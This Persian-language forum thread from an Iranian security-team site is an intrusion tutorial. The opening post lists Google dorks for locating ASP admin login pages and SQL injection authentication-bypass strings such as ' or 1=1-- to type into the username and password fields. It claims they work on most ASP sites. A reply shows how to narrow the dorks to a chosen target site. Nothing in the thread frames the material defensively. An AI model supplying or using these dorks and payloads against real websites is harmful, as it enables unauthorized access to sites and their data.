رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ارسال های توصیه شده

با سلام  امروز یک آموزش ویژه  براتون آوردم  B) 

 

شما با این روش بدون داشتن نام کاربری و رمز عبور ادمین به سایت نفوذ میکنید ..!

این روش فقط روی سایت های asp جواب میده . 

 

برای شروع یه سری دورک براتون میذارم .

 

دورک ها : دورک ها سری کدهایی هستند که فرد برای جستوی سریع و دقیق تردر موتور های جستجو گر از آن 

استفاده میکند.

 

"inurl:admin.asp"

"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

 

 

خب این از دورک ها . اینم از نام کاربری و رمز ها :

 

'=' 'or'
'or ' 'x'='x
"or "x"="x
or 0=0 #
'or 1=1--

 

 

دقت داشته باشید اگر نام کاربری '=' 'or' باشه پسورد هم '=' 'or' هستش برای مثال 

نام کاربری : '=' 'or'

پسورد :  '=' 'or' 

==================================================

 

نام کاربری : 'or ' 'x'='x

 رمز :     'or ' 'x'='x 

 

==================================================

 

خب اگر همه رو امتحان کنید جواب میده.

 

اینم بگم که این ها روی 90% از سایت های asp جواب میدن

 

موفق و پیروز باشید

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

  • 4 ماه بعد...

بسیار ممون و متشکر اگر فیلم اماده می کردید برای دوستان مبتدی خوانا تر بود بازم تشکر

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

این رو هم اضافه کنم گاهی وقت ها ما یک سایت مشخص رو می خوایم هک کنیم پس دروک ها بدین شکل در میان:

… :site:x inurl

این … همون دروک های دوست عزیزم P@ssK!ll3r است و x هم target مون هستش موفق باشید

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

  • 1 سال بعد...

درک ها رو چکار کنم ؟ مشه دقیق بگید مبتدی هستم

دورک ها ابزاری برا جستجوی دقیق تر و بهتر تو گوگل هستن مثلا دورک مخصوص میسازیم که پسوند فقط org باشع یا مثلا تو urlش index.php باشه بطور مثال بعد با جستجو تو گوگل این عبارت به چیزی ک میخوام سریعتر میرسم /.

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

  • 3 سال بعد...
  • 1 سال بعد...

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...